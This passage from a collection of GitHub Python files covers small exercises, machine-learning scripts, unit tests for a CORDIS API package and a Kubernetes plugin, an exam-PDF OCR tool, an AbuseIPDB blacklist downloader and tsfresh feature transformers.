new_time+=\"PM\"\r\n else:\r\n actual_hours-=24\r\n if(actual_minutes>=10):\r\n new_time=str(actual_hours)+\":\"+str(actual_minutes)+\" \"+time_domain[0]\r\n else:\r\n new_time=str(actual_hours)+\":\"+\"0\"+str(actual_minutes)+\" \"+time_domain[0]\r\n if(default!=\"1\"):\r\n days_list=[\"Monday\",\"Tuesday\",\"Wednesday\",\"Thursday\",\"Friday\",\"Saturday\",\"Sunday\"]\r\n day_no=0\r\n for string in days_list:\r\n count=0\r\n if(default.capitalize()==string):\r\n break\r\n else:\r\n day_no+=1\r\n if(time_domain[0]==\"PM\"):\r\n hours_added=int(hour_1[0])+int(hour_1[1])+12\r\n else:\r\n if(hour_1[0]==\"12\"):\r\n hour_1[0]=\"0\"\r\n hours_added=int(hour_1[0])+int(hour_1[1])\r\n minutes_added=int(minute_1[0])+int(minute_1[1])\r\n if(minutes_added>=60):\r\n hours_added+=1\r\n days=hours_added//24\r\n if(default==\"1\"):\r\n if(days>=1):\r\n if(days==1):\r\n new_time+=\" \"+\"(next day)\"\r\n else:\r\n new_time+=\" \"+\"(\"+str(days)+\" \"+\"days\"+\" later)\"\r\n else:\r\n if(days<1):\r\n new_time+=\", \"+string\r\n elif(days==1):\r\n new_time+=\", \"+days_list[(day_no+1)%7].capitalize()+\" \"+\"(next day)\"\r\n else:\r\n new_time+=\", \"+days_list[(day_no+days)%7].capitalize()+\" \"+\"(\"+str(days)+\" days later)\"\r\n \r\n return new_time\r\nnew_time=add_time(\"8:16 PM\",\"466:02\")\r\nprint(new_time)\r\n","repo_name":"Wiz-2/Python_free_code_camp","sub_path":"time_free_1.py","file_name":"time_free_1.py","file_ext":"py","file_size_in_byte":3363,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"69"}
+{"seq_id":"42533770741","text":"class Dice:\n def __init__(self, x):\n self.top = x[0]\n self.front = x[1]\n self.right = x[2]\n self.left = x[3]\n self.back = x[4]\n self.bottom = x[5]\n self.list = x\n\n def N(self):\n self.top, self.front, self.bottom, self.back = (\n self.front,\n self.bottom,\n self.back,\n self.top,\n )\n\n def E(self):\n self.top, self.right, self.bottom, self.left = (\n self.left,\n self.top,\n self.right,\n self.bottom,\n )\n\n def S(self):\n self.top, self.front, self.bottom, self.back = (\n self.back,\n self.top,\n self.front,\n self.bottom,\n )\n\n def W(self):\n self.top, self.right, self.bottom, self.left = (\n self.right,\n self.bottom,\n self.left,\n self.top,\n )\n\n def up_front_to_right(self, top, front):\n if (top, front) in [\n (self.top, self.front),\n (self.front, self.bottom),\n (self.bottom, self.back),\n (self.back, self.top),\n ]:\n return self.right\n elif (top, front) in [\n (self.front, self.top),\n (self.bottom, self.front),\n (self.back, self.bottom),\n (self.top, self.back),\n ]:\n return self.left\n elif (top, front) in [\n (self.left, self.front),\n (self.front, self.right),\n (self.right, self.back),\n (self.back, self.left),\n ]:\n return self.top\n elif (top, front) in [\n (self.front, self.left),\n (self.right, self.front),\n (self.back, self.right),\n (self.left, self.back),\n ]:\n return self.bottom\n elif (top, front) in [\n (self.top, self.left),\n (self.left, self.bottom),\n (self.bottom, self.right),\n (self.right, self.top),\n ]:\n return self.front\n elif (top, front) in [\n (self.left, self.top),\n (self.bottom, self.left),\n (self.right, self.bottom),\n (self.top, self.right),\n ]:\n return self.back\n else:\n return -1\n\n def inverse(self, a):\n if a == self.top:\n return self.bottom\n elif a == self.front:\n return self.back\n elif a == self.right:\n return self.left\n elif a == self.left:\n return self.right\n elif a == self.back:\n return self.front\n elif a == self.front:\n return self.back\n else:\n return -1\n\n\ndef same(dice0, dice1):\n x = dice0.list\n for i in range(6):\n for j in range(i + 1, 6):\n if x[i] != dice0.inverse(x[j]):\n a = dice0.up_front_to_right(x[i], x[j])\n b = dice1.up_front_to_right(x[i], x[j])\n if a != b:\n return False\n return True\n\n\nn = int(input())\nX = []\nfor i in range(n):\n (*x,) = map(int, input().split())\n X.append(Dice(x))\nfor i in range(n):\n for j in range(i + 1, n):\n if same(X[i], X[j]):\n print(\"No\")\n exit()\nprint(\"Yes\")\n","repo_name":"fujihiraryo/aizu-online-judge","sub_path":"ITP1/11D_Dice4.py","file_name":"11D_Dice4.py","file_ext":"py","file_size_in_byte":3315,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"69"}
+{"seq_id":"43635672753","text":"import pycaret.regression as pc\nimport pandas as pd\nfrom sklearn import model_selection\nimport mlflow\nimport sys\n\n\n# Argumentos para a rotina de treinamento\nseed = int(sys.argv[1]) if len(sys.argv) > 1 else 1\nexperiment_name = sys.argv[2] if len(sys.argv) > 2 else 'wine-ml-model'\n\n\n\n## CONFIGURACAO\ntest_size = 0.2\nmodel_name = 'classificacao_vinhos' # evitar espacos, -, e outros caracteres.\nwine_target_col = 'target'\nignore_features = ['target_label']\ncategorical_features = ['type']\n\n\n## LEITURA DOS DADOS DE TREINAMENTO\ndf_wine = pd.read_csv('../Data/dataset_vinhos.csv',sep=';')\nwine_label_map = df_wine[['target', 'target_label']].drop_duplicates()\nprint(df_wine.shape)\ndf_wine.head()\n\n## TREINAMENTO DO MODELO\nY = df_wine[wine_target_col]\nX = df_wine.drop(wine_target_col, axis=1)\nxtrain, xtest, ytrain, ytest = model_selection.train_test_split(X, Y, test_size=test_size, random_state = seed)\ndf_train = xtrain.copy()\ndf_test = xtest.copy()\ndf_train[wine_target_col] = ytrain\ndf_test[wine_target_col] = ytest\n\n# mlflow.set_tracking_uri(\"sqlite:///mlruns.db\")\n\ns = pc.setup(data = df_train, \n target = wine_target_col,\n test_data=df_test,\n categorical_features = categorical_features,\n ignore_features = ignore_features,\n silent = True, \n experiment_name = experiment_name, \n log_experiment = True, \n log_plots = True)\nmodels = ['lr', 'dt', 'rf']\nbestmodel = pc.compare_models(include = models)\n\nclassification_plots = [ 'auc', 'confusion_matrix','error','class_report',\n 'learning','vc','feature',]\nfor plot_type in classification_plots:\n print('=> Aplicando plot ', plot_type)\n try:\n artifact = pc.plot_model(bestmodel, plot=plot_type, save=True)\n mlflow.log_artifact(artifact)\n except:\n print('=> Nao possivel plotar: ', plot_type )\n continue\n\nmlflow.end_run()\n \n","repo_name":"tciodaro/ead_datascience","sub_path":"Code/ml_wine.py","file_name":"ml_wine.py","file_ext":"py","file_size_in_byte":1938,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"69"}
+{"seq_id":"19807477846","text":"import pytest\nfrom unittest import mock\nfrom nesta.packages.cordis.cordis_api import hit_api\nfrom nesta.packages.cordis.cordis_api import extract_fields\nfrom nesta.packages.cordis.cordis_api import get_framework_ids\nfrom nesta.packages.cordis.cordis_api import fetch_data\n\nPKGPATH = 'nesta.packages.cordis.cordis_api.{}'\n\n\n@mock.patch(PKGPATH.format('requests.get'))\ndef test_hit_api(mocked_get):\n dummy_data = 'somedata'\n mocked_get().json.return_value = {'payload': dummy_data}\n kwargs_list = [dict(api='', rcn='r', content_type='ct'),\n dict(api='a', rcn='s', content_type='cta')]\n for kwargs in kwargs_list:\n data = hit_api(**kwargs)\n assert data == dummy_data\n (url,), _kwargs = mocked_get.call_args\n params = _kwargs['params']\n assert url.endswith(kwargs['api'])\n assert params['rcn'] == kwargs['rcn']\n assert params['contenttype'] == kwargs['content_type']\n assert len(params) == 4\n\n\ndef test_extract_fields():\n fields = ['fourth', 'third']\n data = {'first': '1st',\n 'second': '2nd',\n 'third': [{'title': '3rd', 'rcn': '33',\n 'other': 'junk'},\n {'title': '3ard', 'rcn': '33a',\n 'other': 'junka'}],\n 'fourth': '4th'}\n out_data = extract_fields(data, fields)\n assert set(out_data.keys()) == set(fields)\n assert out_data['third'] == [{'title': '3rd', 'rcn': '33'},\n {'title': '3ard', 'rcn': '33a'}]\n assert out_data['fourth'] == data['fourth']\n\n\ndef test_extract_fields_bad_field():\n fields = ['fifth']\n data = {'first': '1st'} \n assert extract_fields(data, fields) == {}\n\n\n@mock.patch(PKGPATH.format('pd'))\ndef test_get_framework_ids(mocked_pd):\n framework = 'h2229'\n assert type(get_framework_ids(framework)) is list\n (url,), kwargs = mocked_pd.read_csv.call_args\n assert framework in url\n\n\n@mock.patch(PKGPATH.format('hit_api'))\n@mock.patch(PKGPATH.format('extract_fields'))\ndef test_fetch_data(mocked_extract, mocked_api):\n response = fetch_data(None)\n assert type(response) is tuple\n assert len(response) == 4\n","repo_name":"nestauk/old_nesta_daps","sub_path":"nesta/packages/cordis/tests/test_get_cordis_api.py","file_name":"test_get_cordis_api.py","file_ext":"py","file_size_in_byte":2185,"program_lang":"python","lang":"en","doc_type":"code","stars":17,"dataset":"github-code","pt":"69"}
+{"seq_id":"3070445730","text":"# Licensed under the Apache License, Version 2.0 (the \"License\");\n# you may not use this file except in compliance with the License.\n# You may obtain a copy of the License at\n#\n# http://www.apache.org/licenses/LICENSE-2.0\n#\n# Unless required by applicable law or agreed to in writing, software\n# distributed under the License is distributed on an \"AS IS\" BASIS,\n# * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.\n# * See the License for the specific language governing permissions and\n# * limitations under the License.\n\n# Built-in Imports\nimport testtools\nimport fabric\nimport yaml\n\n# Third Party Imports\n\n# Cloudify Imports is imported and used in operations\nfrom kube_plugin import remote_tasks\nfrom mock import patch, mock_open\n# from cloudify import manager\nfrom cloudify.state import current_ctx\nfrom cloudify.mocks import MockContext\nfrom cloudify.mocks import MockCloudifyContext\n# from cloudify.mocks import MockNodeContext\n# from cloudify.mocks import MockNodeInstanceContext\n# from cloudify.mocks import MockRelationshipContext\n# from cloudify.mocks import MockRelationshipSubjectContext\n# from cloudify.exceptions import NonRecoverableError\n\n_test_open = mock_open()\n\n\nclass rc():\n\n def __init__(self, retcode=0, stderr='this is some output'):\n self.return_code = retcode\n self.stderr = stderr\n\n\nclass TestKubeTasks(testtools.TestCase):\n\n def relationship_context(self):\n\n target_node_context = MockContext({\n 'node': MockContext({\n 'properties': {\n 'ip': \"1.1.1.1\",\n 'master_port': '33'\n }\n }),\n 'instance': MockContext({\n 'runtime_properties': {}\n })\n })\n\n source_node_context = MockContext({\n 'instance': MockContext({\n 'runtime_properties': {}\n })\n })\n\n return MockCloudifyContext(\n node_id=\"test\",\n source=source_node_context,\n target=target_node_context)\n\n def test_connect_local(self):\n \"\"\" This tests that connecting to a master node in local mode works \"\"\"\n\n ctx = self.relationship_context()\n ctx._local = True\n current_ctx.set(ctx=ctx)\n\n remote_tasks.connect_master()\n self.assertIn('master_ip', ctx.source.instance.runtime_properties)\n self.assertEquals(ctx.source.instance.runtime_properties[\n 'master_ip'], \"1.1.1.1\")\n\n def test_connect_remote(self):\n \"\"\" This tests that connecting to a master node that cloudify isn't\n managing\n \"\"\"\n ctx = self.relationship_context()\n ctx.target.node.type = \"cloudify.kubernetes.Master\"\n current_ctx.set(ctx=ctx)\n remote_tasks.connect_master()\n self.assertEquals(ctx.source.instance.runtime_properties[\n 'master_ip'], \"1.1.1.1\")\n self.assertEquals(\n ctx.source.instance.runtime_properties['master_port'], \"33\")\n\n def test_connect_proxy(self):\n \"\"\" This tests that connecting to a master node that cloudify\n isn't managing\n \"\"\"\n ctx = self.relationship_context()\n ctx.target.node.type = \"cloudify.nodes.DeploymentProxy\"\n ctx.target.instance.runtime_properties['kubernetes_info'] = {}\n ctx.target.instance.runtime_properties[\n 'kubernetes_info']['url'] = 'http://33.33.33.33:1234'\n current_ctx.set(ctx=ctx)\n remote_tasks.connect_master(\n kubernetes_url_prop='[\"kubernetes_info\"][\"url\"]')\n\n @patch('kube_plugin.remote_tasks.run', spec=fabric.api.run)\n @patch('kube_plugin.remote_tasks.put', spec=fabric.api.put)\n @patch('kube_plugin.remote_tasks.open', _test_open)\n def test_kube_run_with_config(self, mock_put, mock_run):\n\n ctx = MockCloudifyContext(node_id='test',\n properties={\n 
'config': {'key1': {'key1.1': 'val1.1'}},\n 'config_files': None,\n 'ssh_username': 'ubuntu',\n 'ssh_keyfilename': '/root/.ssh/agent_key',\n },\n runtime_properties={\n 'master_ip': '1.1.1.1',\n }\n )\n current_ctx.set(ctx=ctx)\n mock_run.return_value = rc()\n remote_tasks.kube_run_expose()\n self.assertEquals(_test_open.call_count, 1)\n yamlout = ''\n for call in _test_open.mock_calls:\n if call[0] == '().write':\n yamlout += call[1][0]\n config_yaml = '{ \"key1\": { \"key1.1\": \"val1.1\" }}'\n y1 = yaml.load(config_yaml)\n y2 = yaml.load(yamlout)\n self.assertEquals(y1, y2)\n self.assertEquals(mock_put.call_count, 1)\n self.assertEquals(mock_run.call_count, 1)\n\n def test_kube_run_with_config_files_nosubs(self):\n\n @patch('kube_plugin.remote_tasks.open', _test_open)\n @patch('kube_plugin.remote_tasks.run', spec=fabric.api.run)\n @patch('kube_plugin.remote_tasks.put', spec=fabric.api.put)\n @patch('kube_plugin.remote_tasks.yaml.load', spec=yaml.load)\n def inner(self, mock_yaml, mock_put, mock_run):\n\n ctx = MockCloudifyContext(\n node_id='test',\n properties={'config': None,\n 'config_files': [{'file': 'test.yaml'}],\n 'ssh_username': 'ubuntu',\n 'ssh_keyfilename': '/root/.ssh/agent_key', },\n runtime_properties={'master_ip': '1.1.1.1', })\n\n _test_open.reset_mock()\n\n def dl(self):\n return \"nopath\"\n ctx.download_resource = dl\n\n mock_run.return_value = rc()\n mock_yaml.return_value = {\n 'kind': 'pod', 'metadata': {\n 'name': 'service'}}\n\n current_ctx.set(ctx=ctx)\n remote_tasks.kube_run_expose()\n\n # reads then writes\n self.assertEquals(_test_open.call_count, 2)\n self.assertEquals(mock_put.call_count, 1)\n self.assertEquals(mock_run.call_count, 1)\n\n yamlout = ''\n for call in _test_open.mock_calls:\n if call[0] == '().write':\n yamlout += call[1][0]\n return yamlout\n\n yamlout = inner(self)\n config_yaml = \"{'kind':'pod','metadata':{'name':'service'}}\"\n y1 = yaml.load(config_yaml)\n y2 = yaml.load(yamlout)\n self.assertEquals(y1, y2)\n\n def test_kube_run_with_config_files_nosubs_multi(self):\n\n @patch('kube_plugin.remote_tasks.open', _test_open)\n @patch('kube_plugin.remote_tasks.run', spec=fabric.api.run)\n @patch('kube_plugin.remote_tasks.put', spec=fabric.api.put)\n @patch('kube_plugin.remote_tasks.yaml.load', spec=yaml.load)\n def inner(self, mock_yaml, mock_put, mock_run):\n\n ctx = MockCloudifyContext(node_id='test',\n properties={\n 'config': None,\n 'config_files': [{'file': 'test.yaml'},\n {'file': 'test2.yaml'}\n ],\n 'ssh_username': 'ubuntu',\n 'ssh_keyfilename':\n '/root/.ssh/agent_key',\n },\n runtime_properties={\n 'master_ip': '1.1.1.1',\n }\n )\n\n _test_open.reset_mock()\n\n def dl(self):\n return \"nopath\"\n ctx.download_resource = dl\n\n mock_run.return_value = rc()\n mock_yaml.return_value = {\n 'kind': 'pod', 'metadata': {\n 'name': 'service'}}\n\n current_ctx.set(ctx=ctx)\n remote_tasks.kube_run_expose()\n\n # reads then writes\n self.assertEquals(_test_open.call_count, 4)\n self.assertEquals(mock_put.call_count, 2)\n self.assertEquals(mock_run.call_count, 2)\n\n yamlout = ''\n for call in _test_open.mock_calls:\n if call[0] == '().write':\n yamlout += call[1][0]\n return yamlout\n\n yamlout = inner(self)\n config_yaml = \"{'kind':'pod','metadata':{'name':'service'}}\"\n y1 = yaml.load(config_yaml)\n y2 = yaml.load(yamlout)\n self.assertEquals(y1, y2)\n\n def test_kube_run_with_config_file_subs(self):\n\n @patch('kube_plugin.remote_tasks.open', _test_open)\n @patch('kube_plugin.remote_tasks.manager.get_rest_client')\n 
@patch('kube_plugin.remote_tasks.run', spec=fabric.api.run)\n @patch('kube_plugin.remote_tasks.put', spec=fabric.api.put)\n @patch('kube_plugin.remote_tasks.yaml.load', spec=yaml.load)\n def inner(self, mock_yaml, mock_put, mock_run, rest_open):\n\n # simple, runtime prop, and context prop\n overrides = [\n \"['key1']='sub1'\",\n \"['key2']='@{test,master_ip}'\",\n \"['key3']='%{instance.id}'\"\n ]\n ctx = MockCloudifyContext(node_id='test',\n properties={\n 'config': None,\n 'config_files': [{'file': 'test.yaml',\n 'overrides': overrides\n }],\n 'ssh_username': 'ubuntu',\n 'ssh_keyfilename':\n '/root/.ssh/agent_key',\n },\n runtime_properties={\n 'master_ip': '1.1.1.1',\n }\n )\n\n class mock_rest_client():\n\n class _instances():\n\n def list(self, **kwargs):\n return [\n ctx._instance\n ]\n node_instances = _instances()\n rest_open.return_value = mock_rest_client()\n\n _test_open.reset_mock()\n\n def dl(self):\n return \"nopath\"\n ctx.download_resource = dl\n\n mock_run.return_value = rc()\n mock_yaml.return_value = {\n 'kind': 'pod',\n 'metadata': {\n 'name': 'service'},\n 'key1': 'val1',\n 'key2': 'val2'}\n\n current_ctx.set(ctx=ctx)\n remote_tasks.kube_run_expose()\n\n # reads then writes\n self.assertEquals(_test_open.call_count, 2)\n self.assertEquals(mock_put.call_count, 1)\n self.assertEquals(mock_run.call_count, 1)\n\n yamlout = ''\n for call in _test_open.mock_calls:\n if call[0] == '().write':\n yamlout += call[1][0]\n return yamlout\n\n yamlout = inner(self)\n config_yaml = \"{'kind':'pod','metadata':{'name':'service'},\\\n 'key1':'sub1','key2':'1.1.1.1','key3':'test'}\"\n y1 = yaml.load(config_yaml)\n y2 = yaml.load(yamlout)\n self.assertEquals(y1, y2)\n","repo_name":"gokulpch/cloudify-kubernetes-plugin","sub_path":"kube_plugin/tests/test_tasks.py","file_name":"test_tasks.py","file_ext":"py","file_size_in_byte":11827,"program_lang":"python","lang":"en","doc_type":"code","dataset":"github-code","pt":"69"}
+{"seq_id":"4588028132","text":"import os, io\nfrom google.cloud import vision\nfrom google.cloud.vision import types\nfrom PIL import Image\nfrom pdf2image import convert_from_path\nimport sys\nimport json\nimport db\n\npth2file = input(\"Enter the path to the pdf file you would like to analyze: \")\npth2json = input(\"Enter the path to the json file for the ServiceAccountToken: \")\nos.environ[\"GOOGLE_APPLICATION_CREDENTIALS\"] = pth2json\nclient = vision.ImageAnnotatorClient()\n\nlast = 1\npages = convert_from_path(pth2file, 500)\nfor i in range(1, len(pages)+1):\n fn = \"page_\" + str(i) + \".png\"\n pages[i-1].save(fn)\nquestions = [[0,0,0,0]]\npgs = [0]\nlasttext = \"\"\nquestiontexts = []\nfor i in range(1, len(pages)+1):\n pth = \"page_\" + str(i) + \".png\" \n with io.open(pth, 'rb') as image_file:\n content = image_file.read()\n image = vision.types.Image(content=content)\n im = Image.open(pth)\n width, height = im.size\n response = client.text_detection(image=image)\n texts = response.text_annotations\n for text in texts:\n req1 = str(last)+\".\"\n req2 = str(last)+\")\"\n req3 = str(last)\n miny = 1000000000000000000000000000000000000000\n if(str(text.description) == req1 or str(text.description) == req2 or str(text.description) == req3):\n pgs.append(i)\n for j in text.bounding_poly.vertices:\n miny = min(miny, j.y)\n miny -= 50\n questions.append([0, miny, width, height])\n if pgs[len(pgs)-1] == pgs[len(pgs)-2]:\n questions[last-1][2] = width\n questions[last-1][3] = miny\n last += 1\n\nfor i in range(1, len(questions)):\n pth = \"page_\" + str(pgs[i]) + \".png\" \n image = Image.open(pth)\n cropped = image.crop((questions[i][0], questions[i][1], questions[i][2], questions[i][3]))\n fname = \"question\" + str(i) + \".png\"\n cropped.save(fname)\n\nos.mkdir('other')\ndata = {}\nalphabet = \"abcdefghijklmnopqrstuvwxyz\"\nfor i in range(1, len(questions)):\n pth = \"question\"+str(i)+\".png\"\n with io.open(pth, 'rb') as image_file:\n content = image_file.read()\n image = vision.types.Image(content=content)\n im = Image.open(pth)\n width, height = im.size\n response = client.text_detection(image=image)\n texts = response.text_annotations\n indlast = 1\n alphalast = 0\n options = [[0,0,0,0]]\n for text in texts:\n req = \"(\"+ str(alphabet[alphalast])+\")\"\n miny = 1000000000000000000000000000000000000000\n if text.description == req:\n for j in text.bounding_poly.vertices:\n miny = min(miny, j.y)\n miny -= 50 \n options.append([0, miny, width, height])\n options[indlast-1][2] = width\n options[indlast-1][3] = miny\n indlast +=1\n alphalast += 1\n q = \"\"\n optiontxt = []\n for j in range(len(options)):\n image = Image.open(pth)\n cropped = image.crop((options[j][0], options[j][1], options[j][2], options[j][3]))\n fname = \"other/question\" + str(i) + \"option\" + str(j) + \".png\"\n cropped.save(fname)\n with io.open(fname, 'rb') as image_file:\n content = image_file.read()\n image2 = vision.types.Image(content=content)\n response = client.text_detection(image=image2)\n texts2 = response.text_annotations\n if j == 0:\n q = texts2[0].description\n else:\n temp = texts2[0].description\n tofnd = \"(\" + str(alphabet[j-1]) + \")\"\n fin2 = temp.replace(tofnd, \"\")\n fin = fin2.replace(\"\\n\", \"\")\n optiontxt.append(fin)\n temp = {}\n temp[\"question\"] = q\n temp[\"options\"] = optiontxt\n data[i] = temp\n db.addquestion(str(q))\n for j in optiontxt:\n db.addoptions(i, str(j))\n\nwith open('data.json', 'w') as outfile:\n json.dump(data, 
outfile)\n","repo_name":"knightron0/exam-analyzer","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":3857,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"69"}
+{"seq_id":"34224454837","text":"from Objective import Objective\nfrom Medium import Medium\n\nimport numpy as np\nimport matplotlib.pyplot as plt\nimport matplotlib as mpl\nfrom mpl_toolkits.mplot3d import Axes3D\nimport seaborn as sns\nfrom itertools import compress\nimport plotly\nimport utils\n\nmpl.use('Qt5Agg')\n\n# Scattering coefficient\n# in um^-1\nmu_s = 0.01070\n\n# Absorption coefficient\nmu_a = 0.0002\n\n# Refractive indices\n# in tissue\nn_i = 1.4\n\n# in air\nn_e = 1\n\n# Anisotropy factor\n# in white matter\ng = .94\n\nsample_depth = 1000\nfocus_depth = 170\nworking_distance = 5940\nNA = 0.54\nfov = np.linspace(0, 0, 1)\n\ndistance_to_sample = working_distance + focus_depth\n\nnum_photons = 5000\n\nmedium_shape = np.array([float('inf'), float('inf'), sample_depth])\nmedium = Medium(medium_shape, mu_s, mu_a, n_i, n_e, g)\n\n# xx, yy = np.meshgrid(range(-100, 100), range(-100, 100), sparse=True)\n# z_1 = xx * 0 + yy * 0\n# z_2 = xx * 0 + yy * 0 + 260\n\nobjective = Objective(NA, working_distance, sample_depth)\n\nphotons = utils.fov_sim(medium, fov, num_photons, focus_depth, omit_bottom=True)\n\nfig = utils.plot_photons(photons[0][0], objective, show_aperture=True)\nplotly.offline.plot(fig, filename='file_1.html')\n\nfig = utils.plot_photon_path(photons[0][0][0])\nplotly.offline.plot(fig, filename='file.html')\n\nacceptance_matrix = utils.calc_acceptance_matrix(photons, objective)\nfig = utils.plot_fov_heatmap(acceptance_matrix, fov)\nplotly.offline.plot(fig, filename='file2.html')\n\n# sns.jointplot(x=positions[:, 0], y=positions[:, 1])\n# sns.jointplot(x=positions[:, 0], y=positions[:, 2])\n#\n\n#\n# plt.show()\n","repo_name":"Sihao/photon_scatter","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":1554,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"69"}
+{"seq_id":"40804802774","text":"import requests\r\nimport json\r\nimport sys\r\n\r\n# Defining the api-endpoint\r\nurl = 'https://api.abuseipdb.com/api/v2/blacklist'\r\n\r\nquerystring = {\r\n 'limit':'500000'\r\n}\r\n\r\nheaders = {\r\n 'Accept': 'text/plain',\r\n 'Key': 'YOUR-ABUSEIPDB-API-KEY'\r\n}\r\n\r\nresponse = requests.request(method='GET', url=url, headers=headers, params=querystring)\r\n\r\n# Formatted output\r\nwith open('abuseipdb.txt', 'w') as f:\r\n\tprint (response.text, file=f)\r\n","repo_name":"dejan995/abuseipdb-firewalld","sub_path":"abuseipdb.py","file_name":"abuseipdb.py","file_ext":"py","file_size_in_byte":437,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"69"}
+{"seq_id":"39872128725","text":"from mmseg.models import EncoderDecoder\n\nfrom ...builder import ARCHITECTURES\n\n\n@ARCHITECTURES.register_module()\nclass EncoderDecoderSearch(EncoderDecoder):\n \"\"\"Encoder Decoder segmentors.\n\n EncoderDecoder typically consists of backbone, decode_head, auxiliary_head.\n Note that auxiliary_head is only used for deep supervision during training,\n which could be dumped during inference.\n \"\"\"\n\n def __init__(self,\n backbone,\n decode_head,\n neck=None,\n auxiliary_head=None,\n train_cfg=None,\n test_cfg=None,\n pretrained=None,\n init_cfg=None,\n connect_head=None):\n super().__init__(backbone, decode_head, neck, auxiliary_head,\n train_cfg, test_cfg, pretrained, init_cfg)\n\n if connect_head is not None:\n from mmseg.models import builder\n for kh, vh in connect_head.items():\n component, attr = vh.split('.')\n value = getattr(getattr(self, component), attr)\n neck[kh] = [value, value, value, value]\n neck['out_channels'] = value\n decode_head[kh] = [value, value, value, value]\n auxiliary_head[kh] = value\n self.neck = builder.build_neck(neck)\n self._init_decode_head(decode_head)\n self._init_auxiliary_head(auxiliary_head)","repo_name":"XT-1997/vitmvt","sub_path":"vitmvt/models/architectures/segmentation/encoder_decoder_search.py","file_name":"encoder_decoder_search.py","file_ext":"py","file_size_in_byte":1458,"program_lang":"python","lang":"en","doc_type":"code","stars":5,"dataset":"github-code","pt":"69"}
+{"seq_id":"5713822774","text":"import rich\nimport requests\nfrom pydantic import BaseModel, Field\nfrom rdflib import Graph\nfrom rdflib.namespace import RDF, SKOS\n\n\nicsm_placenames_url = \"http://icsm.surroundaustralia.com/object?uri=https%3A//linked.data.gov.au/def/placenames-categories&_profile=dd&_mediatype=application/json\"\n\n\nclass Row(BaseModel):\n uri: str\n pref_label: str = Field(alias=\"prefLabel\")\n\n\nif __name__ == \"__main__\":\n response = requests.get(icsm_placenames_url)\n response.raise_for_status()\n\n icsm_placenames = set()\n for item in response.json():\n icsm_placenames.add(item[\"prefLabel\"])\n\n graph = Graph()\n graph.parse(\"pntypes.ttl\")\n\n not_found = []\n concepts = graph.subjects(RDF.type, SKOS.Concept)\n for concept in concepts:\n label = graph.value(concept, SKOS.prefLabel)\n name = str(label).lower()\n if name not in icsm_placenames:\n not_found.append(str(label))\n\n rich.print(\"Not found:\")\n rich.print(sorted(not_found))\n","repo_name":"Spatial-Information-QLD/cam-etl","sub_path":"placenames_compare.py","file_name":"placenames_compare.py","file_ext":"py","file_size_in_byte":986,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"69"}
+{"seq_id":"32346748690","text":"from sklearn.base import BaseEstimator, TransformerMixin\nfrom tsfresh.utilities.dataframe_functions import roll_time_series\nfrom tsfresh.feature_extraction import (\n EfficientFCParameters,\n MinimalFCParameters,\n ComprehensiveFCParameters,\n)\nfrom tsfresh import (\n extract_features,\n select_features,\n extract_relevant_features,\n)\nimport re\nimport os\nfrom datetime import datetime\nfrom joblib import dump\n\n\nclass BuildRollingWindows(BaseEstimator, TransformerMixin):\n \"\"\"\n Takes in a Pandas Dataframe, and creates a rolled version of it building multiple successive windows of data.\n Each window will contain data up to and including a final index. Shift target y ahead by one time step to honour temporal dependence.\n Wraps `tsfresh` `roll_time_series`, all arguments passed through\n \"\"\"\n\n def __init__(\n self,\n column_id,\n column_sort=None,\n column_kind=None,\n rolling_direction=1,\n max_timeshift=None,\n min_timeshift=0,\n chunksize=None,\n n_jobs=4,\n show_warnings=False,\n disable_progressbar=False,\n distributor=None,\n ):\n\n self.column_id = column_id\n self.column_sort = column_sort\n self.column_kind = column_kind\n self.rolling_direction = rolling_direction\n self.max_timeshift = max_timeshift\n self.min_timeshift = min_timeshift\n self.chunksize = chunksize\n self.n_jobs = n_jobs\n self.show_warnings = show_warnings\n self.disable_progressbar = disable_progressbar\n self.distributor = distributor\n\n def fit(self, X, y=None):\n return self\n\n def transform(self, X, y=None):\n\n windows = roll_time_series(\n X,\n self.column_id,\n self.column_sort,\n self.column_kind,\n self.rolling_direction,\n self.max_timeshift,\n self.min_timeshift,\n self.chunksize,\n self.n_jobs,\n self.show_warnings,\n self.disable_progressbar,\n self.distributor,\n )\n\n return windows\n\n\nclass AddEma(BaseEstimator, TransformerMixin):\n \"\"\"\n Takes in a time series Pandas dataframe, adds exponential moving averages for each column in input dataframe for each amount of days..\n Exponential moving average parametrized in terms of smoothing = 2/(days + 1).\n \"\"\"\n\n def __init__(self, periods=[12, 25, 50, 100], except_cols=[\"id\"]):\n self.periods = periods\n self.except_cols = except_cols\n\n def fit(self, X, y=None):\n return self\n\n def transform(self, X, y=None):\n\n X_out = X.copy()\n for d in self.periods:\n for c in set(X.columns).difference(set(self.except_cols)):\n X_out[f\"{c}_ema_{d}_period\"] = X[c].ewm(span=d).mean()\n\n return X_out\n\n\nclass ExtractTSFeatures(BaseEstimator, TransformerMixin):\n \"\"\"\n Quick wrapper to allow for properly aligned time series X,y to use `tsfresh` feature augmentation.\n Expects Pandas DataFrames\n ASSUMES X,y sorted from oldest to newest already!\n \"\"\"\n\n def __init__(\n self,\n column_id,\n column_sort,\n chunk_size=100,\n default_fc_parameters=MinimalFCParameters(),\n n_jobs=0,\n ):\n \"\"\"\n Parameters\n ----------\n column_id: str\n Which column to identify different groups of time series. 
